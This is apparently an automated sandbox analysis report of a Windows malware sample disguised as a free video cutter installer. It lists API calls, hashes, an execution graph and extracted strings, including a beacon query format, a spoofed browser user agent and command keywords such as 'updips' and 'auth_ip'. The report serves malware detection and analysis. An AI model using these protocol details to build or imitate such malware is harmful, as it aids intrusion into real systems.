                                                                               • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: DirectoryErrorExecuteLastShellSystem
                                                                              • String ID: <
                                                                              • API String ID: 893404051-4251816714
                                                                              • Opcode ID: eda88bca0edbb1d4d60b2465a169ef4fc32f774dfe42a6a5e367270b0e7eae9d
                                                                              • Instruction ID: 92df0b2f1231c5c49ece4c570041ef31d6ed92e86db86b93cafb864a5026e18c
                                                                              • Opcode Fuzzy Hash: eda88bca0edbb1d4d60b2465a169ef4fc32f774dfe42a6a5e367270b0e7eae9d
                                                                              • Instruction Fuzzy Hash: 172167B0600609ABDB10EF65C8926AE7BE8AF44355F54403AFC44E7291D7789E49CB98
                                                                              APIs
                                                                              • RtlEnterCriticalSection.KERNEL32(0049B420,00000000,)), ref: 004025C7
                                                                              • RtlLeaveCriticalSection.KERNEL32(0049B420,0040263D), ref: 00402630
                                                                                • Part of subcall function 004019CC: RtlInitializeCriticalSection.KERNEL32(0049B420,00000000,00401A82,?,?,0040222E,023AC268,00003D94,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019E2
                                                                                • Part of subcall function 004019CC: RtlEnterCriticalSection.KERNEL32(0049B420,0049B420,00000000,00401A82,?,?,0040222E,023AC268,00003D94,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019F5
                                                                                • Part of subcall function 004019CC: LocalAlloc.KERNEL32(00000000,00000FF8,0049B420,00000000,00401A82,?,?,0040222E,023AC268,00003D94,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A1F
                                                                                • Part of subcall function 004019CC: RtlLeaveCriticalSection.KERNEL32(0049B420,00401A89,00000000,00401A82,?,?,0040222E,023AC268,00003D94,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A7C
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: CriticalSection$EnterLeave$AllocInitializeLocal
                                                                              • String ID: )
                                                                              • API String ID: 2227675388-1084416617
                                                                              • Opcode ID: e007287126da8fa7f668c9e0dd370e3762efe765c6f58c3167b97aa7cf6c64ab
                                                                              • Instruction ID: 77bd95ba853a3ee3b707a504883d316aad751082ca23ba06a0d8aa2ba3da16af
                                                                              • Opcode Fuzzy Hash: e007287126da8fa7f668c9e0dd370e3762efe765c6f58c3167b97aa7cf6c64ab
                                                                              • Instruction Fuzzy Hash: E11104317042046FEB15AB796F5962B6AD4D795758B24087FF404F33D2DABD8C02929C
                                                                              APIs
                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097), ref: 004966D9
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: Window
                                                                              • String ID: /INITPROCWND=$%x $@
                                                                              • API String ID: 2353593579-4169826103
                                                                              • Opcode ID: b4f4c19a8bc55ff90c2e9b73843465f76c245e37ca3079c0cf601615490e7546
                                                                              • Instruction ID: 2823dcf8e8ddb1ccfa98fa5e384fb34ae0e14248cce506d77a4005fc3c11fa4c
                                                                              • Opcode Fuzzy Hash: b4f4c19a8bc55ff90c2e9b73843465f76c245e37ca3079c0cf601615490e7546
                                                                              • Instruction Fuzzy Hash: 4711A531A042089FDF01DFA4D851BAE7FE8EB48318F5144BBE504E7291DB7C9905C658
                                                                              APIs
                                                                                • Part of subcall function 00403CA4: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
                                                                                • Part of subcall function 00403CA4: SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9
                                                                              • SysFreeString.OLEAUT32(?), ref: 004474C6
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: String$AllocByteCharFreeMultiWide
                                                                              • String ID: NIL Interface Exception$Unknown Method
                                                                              • API String ID: 3952431833-1023667238
                                                                              • Opcode ID: 4f43f2048f3271615f10b1acac82c539bd88d3f79065c454e3b767f871ffd8a8
                                                                              • Instruction ID: eb0132878ffe7144b3db707554455947565e11d0cdd4dc78092451a8fec87e99
                                                                              • Opcode Fuzzy Hash: 4f43f2048f3271615f10b1acac82c539bd88d3f79065c454e3b767f871ffd8a8
                                                                              • Instruction Fuzzy Hash: 8011B9706082089FEB10DFA58C52A6EBBBCEB09704F91407AF504F7681D77C9D01CB69
                                                                              APIs
                                                                              • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,000000FC,?,00495FD8,?,00495FCC,00000000,00495FB3), ref: 00495F7E
                                                                              • CloseHandle.KERNEL32(00496018,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,000000FC,?,00495FD8,?,00495FCC,00000000), ref: 00495F95
                                                                                • Part of subcall function 00495E68: GetLastError.KERNEL32(00000000,00495F00,?,?,?,?), ref: 00495E8C
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: CloseCreateErrorHandleLastProcess
                                                                              • String ID: D
                                                                              • API String ID: 3798668922-2746444292
                                                                              • Opcode ID: 2cac3968973140c3bf288dcd51b8fea51afb9ccec72b099e887b62547fa5ce6a
                                                                              • Instruction ID: f27f12c2402a3b04c6ef5f500e2c30b4f6e8a0b8f5398e8f95c33b3eb070371b
                                                                              • Opcode Fuzzy Hash: 2cac3968973140c3bf288dcd51b8fea51afb9ccec72b099e887b62547fa5ce6a
                                                                              • Instruction Fuzzy Hash: FC015EB1644648AFDF05DBA2DD42E9EBBACDB08714F61003AF904E72C5D6789E048B68
                                                                              APIs
                                                                              • RegQueryValueExA.ADVAPI32(?,Inno Setup: No Icons,00000000,00000000,00000000,00000000), ref: 0042DD78
                                                                              • RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,Inno Setup: No Icons,00000000,00000000,00000000), ref: 0042DDB8
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: Value$EnumQuery
                                                                              • String ID: Inno Setup: No Icons
                                                                              • API String ID: 1576479698-2016326496
                                                                              • Opcode ID: 36a0b08f46d91d09f38f531e186592c2a543f82488f0210131226a48688c00be
                                                                              • Instruction ID: 8d080c6700cf8453afd411d185ff7d2dd707f59376968ad674d2e7d16536e1ed
                                                                              • Opcode Fuzzy Hash: 36a0b08f46d91d09f38f531e186592c2a543f82488f0210131226a48688c00be
                                                                              • Instruction Fuzzy Hash: 1B012B33B55B7179FB3045256D01F7B57889B82B60F64013BF942EA2C0D6999C04936E
                                                                              APIs
                                                                                • Part of subcall function 004555E4: GetCurrentProcess.KERNEL32(00000028), ref: 004555F3
                                                                                • Part of subcall function 004555E4: OpenProcessToken.ADVAPI32(00000000,00000028), ref: 004555F9
                                                                              • SetForegroundWindow.USER32(?), ref: 00497406
                                                                              Strings
                                                                              • Not restarting Windows because Uninstall is being run from the debugger., xrefs: 00497431
                                                                              • Restarting Windows., xrefs: 004973E3
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: Process$CurrentForegroundOpenTokenWindow
                                                                              • String ID: Not restarting Windows because Uninstall is being run from the debugger.$Restarting Windows.
                                                                              • API String ID: 3179053593-4147564754
                                                                              • Opcode ID: 4193847a8af397455179383c4cf3c5e93af51966d3aee1b0e62b09f4ca4c6cf6
                                                                              • Instruction ID: 81a48865aaf16d48f947dda4b05133a8651c2c420a775bb83d5095b98b759fde
                                                                              • Opcode Fuzzy Hash: 4193847a8af397455179383c4cf3c5e93af51966d3aee1b0e62b09f4ca4c6cf6
                                                                              • Instruction Fuzzy Hash: 1C01B5B0618244AAEB01FB66E992B983F989B44308F80407BF5446B2D3C73C994AC75D
                                                                              APIs
                                                                                • Part of subcall function 0047CBBC: FreeLibrary.KERNEL32(74610000,00481513), ref: 0047CBD2
                                                                                • Part of subcall function 0047C88C: GetTickCount.KERNEL32 ref: 0047C8D6
                                                                                • Part of subcall function 004570E0: SendMessageA.USER32(00000000,00000B01,00000000,00000000), ref: 004570FF
                                                                              • GetCurrentProcess.KERNEL32(00000001,?,?,?,?,004984CB), ref: 00497BC9
                                                                              • TerminateProcess.KERNEL32(00000000,00000001,?,?,?,?,004984CB), ref: 00497BCF
                                                                              Strings
                                                                              • Detected restart. Removing temporary directory., xrefs: 00497B83
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: Process$CountCurrentFreeLibraryMessageSendTerminateTick
                                                                              • String ID: Detected restart. Removing temporary directory.
                                                                              • API String ID: 1717587489-3199836293
                                                                              • Opcode ID: edd495a3eb806bce708dfd09f75f47a0044e32d2cd5383a21bd3adb2a5963435
                                                                              • Instruction ID: d50bc6c630895905583a3a2fadab6dc9590d78cbbd3fad9bb3e23ee4b0713a5b
                                                                              • Opcode Fuzzy Hash: edd495a3eb806bce708dfd09f75f47a0044e32d2cd5383a21bd3adb2a5963435
                                                                              • Instruction Fuzzy Hash: C8E0E57221C7042EDA1177B7BC62A573F8CD74576C761447FF90881992C42D6810C67D
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorLastSleep
                                                                              • String ID:
                                                                              • API String ID: 1458359878-0
                                                                              • Opcode ID: 6f2b27bda8ca5cc9560dd93be1cc0b104f7b92667656e0278d509a2706482566
                                                                              • Instruction ID: f31041694d7e6b08a2ea33ec2b58b28b25921f40701f973673b956735a8b67d8
                                                                              • Opcode Fuzzy Hash: 6f2b27bda8ca5cc9560dd93be1cc0b104f7b92667656e0278d509a2706482566
                                                                              • Instruction Fuzzy Hash: 42F02B32705F58A78B21B56A889157FB2A8DB81366750012BFC0CD7313C878CC058BBC

                                                                              Execution Graph

                                                                              Execution Coverage:2.4%
                                                                              Dynamic/Decrypted Code Coverage:66.4%
                                                                              Signature Coverage:19.4%
                                                                              Total number of Nodes:494
                                                                              Total number of Limit Nodes:26
                                                                              execution_graph
4037b1 61810->61812 61813 4037bd GetEnvironmentStrings 61810->61813 61811->61812 61814 4037cd 61811->61814 61816 4037f5 WideCharToMultiByte 61812->61816 61817 4037e9 GetEnvironmentStringsW 61812->61817 61813->61814 61815 402fd4 61813->61815 61814->61815 61818 40386f GetEnvironmentStrings 61814->61818 61822 40387b 61814->61822 61832 403541 61815->61832 61820 403829 61816->61820 61821 40385b FreeEnvironmentStringsW 61816->61821 61817->61815 61817->61816 61818->61815 61818->61822 61824 40308f 12 API calls 61820->61824 61821->61815 61823 40308f 12 API calls 61822->61823 61830 403896 61823->61830 61825 40382f 61824->61825 61825->61821 61826 403838 WideCharToMultiByte 61825->61826 61827 403852 61826->61827 61828 403849 61826->61828 61827->61821 61873 403141 61828->61873 61829 4038ac FreeEnvironmentStringsA 61829->61815 61830->61829 61833 403553 61832->61833 61834 403558 GetModuleFileNameA 61832->61834 61886 405232 19 API calls 61833->61886 61836 40357b 61834->61836 61837 40308f 12 API calls 61836->61837 61838 40359c 61837->61838 61839 4035ac 61838->61839 61887 403046 7 API calls 61838->61887 61839->61771 61842 403495 61841->61842 61844 40349a 61841->61844 61888 405232 19 API calls 61842->61888 61845 40308f 12 API calls 61844->61845 61846 4034c7 61845->61846 61847 4034db 61846->61847 61889 403046 7 API calls 61846->61889 61851 40351e 61847->61851 61852 40308f 12 API calls 61847->61852 61890 403046 7 API calls 61847->61890 61849 403141 7 API calls 61850 40352a 61849->61850 61850->61773 61851->61849 61852->61847 61855 403439 61854->61855 61857 40343e 61854->61857 61891 405232 19 API calls 61855->61891 61857->61776 61859->61780 61860->61782 61861->61787 61862->61793 61863->61793 61868 4030a1 61864->61868 61867 403046 7 API calls 61867->61798 61870 40309e 61868->61870 61871 4030a8 61868->61871 61870->61798 61870->61867 61871->61870 61872 4030cd 12 API calls 61871->61872 61872->61871 61874 403169 61873->61874 61875 40314d 61873->61875 61874->61827 61876 403157 61875->61876 
61877 40316d 61875->61877 61879 403199 HeapFree 61876->61879 61880 403163 61876->61880 61878 403198 61877->61878 61882 403187 61877->61882 61878->61879 61879->61874 61884 40402a VirtualFree VirtualFree HeapFree 61880->61884 61885 404abb VirtualFree HeapFree VirtualFree 61882->61885 61884->61874 61885->61874 61886->61834 61887->61839 61888->61844 61889->61847 61890->61847 61891->61857 61892 402210 61893 402233 OpenSCManagerA 61892->61893 61895 4029d2 61896 40b20a RegCreateKeyExA 61895->61896 61897 40b49d 61896->61897 61898 99104d 61899 9a2154 __cinit 68 API calls 61898->61899 61900 991057 61899->61900 61903 991aa9 InterlockedIncrement 61900->61903 61904 99105c 61903->61904 61905 991ac5 WSAStartup InterlockedExchange 61903->61905 61905->61904 61906 402997 61907 40b5b6 CopyFileA 61906->61907 61908 40b5bc 61907->61908 61908->61908 61909 402658 GetLocalTime 61912 401f27 61909->61912 61913 401f3c 61912->61913 61916 401a1d 61913->61916 61915 401f45 61917 401a2c 61916->61917 61922 401a4f CreateFileA 61917->61922 61921 401a3e 61921->61915 61923 401a35 61922->61923 61926 401a7d 61922->61926 61930 401b4b LoadLibraryA 61923->61930 61924 401a98 DeviceIoControl 61924->61926 61926->61924 61927 401b3a CloseHandle 61926->61927 61928 401b0e GetLastError 61926->61928 61939 402d96 7 API calls 61926->61939 61940 402d88 12 API calls 61926->61940 61927->61923 61928->61926 61928->61927 61931 401c21 61930->61931 61932 401b6e GetProcAddress 61930->61932 61931->61921 61933 401c18 FreeLibrary 61932->61933 61936 401b85 61932->61936 61933->61931 61934 401b95 GetAdaptersInfo 61934->61936 61936->61934 61937 401c15 61936->61937 61941 402d96 7 API calls 61936->61941 61942 402d88 12 API calls 61936->61942 61937->61933 61939->61926 61940->61926 61941->61936 61942->61936 61943 40ba59 lstrcmpiW 61944 40234d 61943->61944 61945 40275c LoadLibraryExA 61946 40216a 61945->61946 61947 4027df 61948 4028e1 61947->61948 61949 40b56a CopyFileA 61947->61949 61949->61948 61950 4022a1 RegCloseKey 61951 40b327 
61950->61951 61952 4025e4 Sleep 61953 40b0aa 61952->61953 61954 a29887 61955 a30ef9 Sleep 61954->61955 61956 40b127 61957 40b4a8 61956->61957 61958 4026bd 61957->61958 61961 40bc2e Sleep 61957->61961 61962 401f64 FindResourceA 61958->61962 61960 40bc4a 61961->61958 61963 401f86 GetLastError SizeofResource 61962->61963 61964 401f9f 61962->61964 61963->61964 61965 401fa6 LoadResource LockResource GlobalAlloc 61963->61965 61964->61960 61966 401fd2 61965->61966 61967 401ffb GetTickCount 61966->61967 61969 402005 GlobalAlloc 61967->61969 61969->61964 61970 402968 RegSetValueExA 61971 40baff RegCloseKey 61970->61971 61972 40bb05 61971->61972 61972->61972 61973 995c76 RtlInitializeCriticalSection GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress 61974 995ce3 GetTickCount 61973->61974 62044 9942c7 61973->62044 62045 9958d7 61974->62045 61977 995d00 GetVersionExA 61978 995d41 _memset 61977->61978 61979 9a1d5c _malloc 59 API calls 61978->61979 61980 995d4e 61979->61980 61981 9a1d5c _malloc 59 API calls 61980->61981 61982 995d5e 61981->61982 61983 9a1d5c _malloc 59 API calls 61982->61983 61984 995d69 61983->61984 61985 9a1d5c _malloc 59 API calls 61984->61985 61986 995d74 61985->61986 61987 9a1d5c _malloc 59 API calls 61986->61987 61988 995d7f 61987->61988 61989 9a1d5c _malloc 59 API calls 61988->61989 61990 995d8a 61989->61990 61991 9a1d5c _malloc 59 API calls 61990->61991 61992 995d95 61991->61992 61993 9a1d5c _malloc 59 API calls 61992->61993 61994 995da1 6 API calls 61993->61994 61995 995dee _memset 61994->61995 61996 995e07 RtlEnterCriticalSection RtlLeaveCriticalSection 61995->61996 61997 9a1d5c _malloc 59 API calls 61996->61997 61998 995e43 61997->61998 61999 9a1d5c _malloc 59 API calls 61998->61999 62000 995e51 61999->62000 62001 9a1d5c _malloc 59 API calls 62000->62001 62002 995e58 62001->62002 62003 9a1d5c _malloc 59 API calls 62002->62003 62004 995e79 QueryPerformanceCounter Sleep 62003->62004 62005 9a1d5c _malloc 59 API calls 62004->62005 62006 
995e9f 62005->62006 62007 9a1d5c _malloc 59 API calls 62006->62007 62036 995eaf _memset 62007->62036 62008 995f1c Sleep 62009 995f22 RtlEnterCriticalSection RtlLeaveCriticalSection 62008->62009 62009->62036 62010 9962b8 RtlEnterCriticalSection RtlLeaveCriticalSection 62011 9a10ec 66 API calls 62010->62011 62011->62036 62012 9a1d5c _malloc 59 API calls 62013 99635a RtlEnterCriticalSection RtlLeaveCriticalSection 62012->62013 62013->62036 62014 996613 RtlEnterCriticalSection RtlLeaveCriticalSection 62014->62036 62015 995a29 59 API calls 62015->62036 62016 9a10ec 66 API calls 62016->62036 62017 9a11c8 _sprintf 84 API calls 62017->62036 62018 991ba7 210 API calls 62018->62036 62019 996777 RtlEnterCriticalSection 62020 9967a4 RtlLeaveCriticalSection 62019->62020 62019->62036 62024 993c67 72 API calls 62020->62024 62021 99534d 93 API calls 62021->62036 62022 9a1d24 59 API calls _free 62022->62036 62023 9a1d5c 59 API calls _malloc 62023->62036 62024->62036 62025 993d7e 64 API calls 62025->62036 62026 9970ea 89 API calls 62026->62036 62027 9a2396 60 API calls _strtok 62027->62036 62028 9994d4 73 API calls 62028->62036 62029 997db2 88 API calls 62029->62036 62030 997199 71 API calls 62030->62036 62031 9a28fc _Allocate 60 API calls 62031->62036 62032 9a1600 _swscanf 59 API calls 62032->62036 62033 9933b2 86 API calls 62033->62036 62034 9984e6 212 API calls 62034->62036 62035 9995fe 60 API calls 62035->62036 62036->62008 62036->62009 62036->62010 62036->62012 62036->62014 62036->62015 62036->62016 62036->62017 62036->62018 62036->62019 62036->62020 62036->62021 62036->62022 62036->62023 62036->62025 62036->62026 62036->62027 62036->62028 62036->62029 62036->62030 62036->62031 62036->62032 62036->62033 62036->62034 62036->62035 62036->62036 62037 995119 103 API calls 62036->62037 62038 99bec6 73 API calls 62036->62038 62039 9999be 210 API calls 62036->62039 62040 996590 Sleep 62036->62040 62042 99658b shared_ptr 62036->62042 62037->62036 62038->62036 62039->62036 62041 9a06a0 
GetProcessHeap HeapFree 62040->62041 62041->62042 62042->62036 62042->62040 62043 994100 GetProcessHeap HeapFree 62042->62043 62043->62042 62046 9a1d5c _malloc 59 API calls 62045->62046 62047 9958ea 62046->62047 62048 40b170 lstrcmpiW

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • RtlInitializeCriticalSection.NTDLL(009C5FB8), ref: 00995CAA
                                                                              • GetModuleHandleA.KERNEL32(ntdll.dll,sprintf), ref: 00995CC1
                                                                              • GetProcAddress.KERNEL32(00000000), ref: 00995CCA
                                                                              • GetModuleHandleA.KERNEL32(ntdll.dll,strcat), ref: 00995CD9
                                                                              • GetProcAddress.KERNEL32(00000000), ref: 00995CDC
                                                                              • GetTickCount.KERNEL32 ref: 00995CF0
                                                                                • Part of subcall function 009958D7: _malloc.LIBCMT ref: 009958E5
                                                                              • GetVersionExA.KERNEL32(009C5E10), ref: 00995D1D
                                                                              • _memset.LIBCMT ref: 00995D3C
                                                                              • _malloc.LIBCMT ref: 00995D49
                                                                                • Part of subcall function 009A1D5C: __FF_MSGBANNER.LIBCMT ref: 009A1D73
                                                                                • Part of subcall function 009A1D5C: __NMSG_WRITE.LIBCMT ref: 009A1D7A
                                                                                • Part of subcall function 009A1D5C: RtlAllocateHeap.NTDLL(00B10000,00000000,00000001), ref: 009A1D9F
                                                                              • _malloc.LIBCMT ref: 00995D59
                                                                              • _malloc.LIBCMT ref: 00995D64
                                                                              • _malloc.LIBCMT ref: 00995D6F
                                                                              • _malloc.LIBCMT ref: 00995D7A
                                                                              • _malloc.LIBCMT ref: 00995D85
                                                                              • _malloc.LIBCMT ref: 00995D90
                                                                              • _malloc.LIBCMT ref: 00995D9C
                                                                              • GetProcessHeap.KERNEL32(00000000,00000004), ref: 00995DB3
                                                                              • RtlAllocateHeap.NTDLL(00000000), ref: 00995DBC
                                                                              • GetProcessHeap.KERNEL32(00000000,00000400), ref: 00995DC8
                                                                              • RtlAllocateHeap.NTDLL(00000000), ref: 00995DCB
                                                                              • GetProcessHeap.KERNEL32(00000000,00000400), ref: 00995DD6
                                                                              • RtlAllocateHeap.NTDLL(00000000), ref: 00995DD9
                                                                              • _memset.LIBCMT ref: 00995DE9
                                                                              • _memset.LIBCMT ref: 00995DF5
                                                                              • _memset.LIBCMT ref: 00995E02
                                                                              • RtlEnterCriticalSection.NTDLL(009C5FB8), ref: 00995E10
                                                                              • RtlLeaveCriticalSection.NTDLL(009C5FB8), ref: 00995E1D
                                                                              • _malloc.LIBCMT ref: 00995E3E
                                                                              • _malloc.LIBCMT ref: 00995E4C
                                                                              • _malloc.LIBCMT ref: 00995E53
                                                                              • _malloc.LIBCMT ref: 00995E74
                                                                              • QueryPerformanceCounter.KERNEL32(00000200), ref: 00995E80
                                                                              • Sleep.KERNEL32(00000000), ref: 00995E8E
                                                                              • _malloc.LIBCMT ref: 00995E9A
                                                                              • _malloc.LIBCMT ref: 00995EAA
                                                                              • _memset.LIBCMT ref: 00995EBF
                                                                              • _memset.LIBCMT ref: 00995ECF
                                                                              • Sleep.KERNEL32(0000EA60), ref: 00995F1C
                                                                              • RtlEnterCriticalSection.NTDLL(009C5FB8), ref: 00995F27
                                                                              • RtlLeaveCriticalSection.NTDLL(009C5FB8), ref: 00995F38
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3874104942.0000000000991000.00000040.00001000.00020000.00000000.sdmp, Offset: 00991000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_991000_videocutterfree.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: _malloc$Heap$_memset$CriticalSection$Allocate$Process$AddressEnterHandleLeaveModuleProcSleep$CountCounterInitializePerformanceQueryTickVersion
                                                                              • String ID: {?$Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)$gpt=%.8x&advizor=%d&box=%d&hp=%x&lp=%x&line=%d&os=%d.%d.%04d&flag=%d&itd=%d$ntdll.dll$sprintf$strcat
                                                                              • API String ID: 1856495841-4024086645
                                                                              • Opcode ID: 3f592b7ef38c67ecc8576cab383424f3145a6bde54ecddfbae8316dd21ba1bf0
                                                                              • Instruction ID: c661365dcc301ddb4f80939225a14aee2687e89ddd4d672d7fe49e706d3e2221
                                                                              • Opcode Fuzzy Hash: 3f592b7ef38c67ecc8576cab383424f3145a6bde54ecddfbae8316dd21ba1bf0
                                                                              • Instruction Fuzzy Hash: C771C5B1D18340AFD710AF75AC09F5BBFE8AF86320F15091DF588972D2D7B869408B96

                                                                              Control-flow Graph

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3874104942.0000000000991000.00000040.00001000.00020000.00000000.sdmp, Offset: 00991000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_991000_videocutterfree.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: $"gk$%d;$<htm$Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)$auth_ip$auth_swith$block$connect$disconnect$idle$updips$updurls$urls
                                                                              • API String ID: 0-2712571627
                                                                              • Opcode ID: cc10e829798e289c9eaea95da83cda4309410800d4195ac11471a7da668302a1
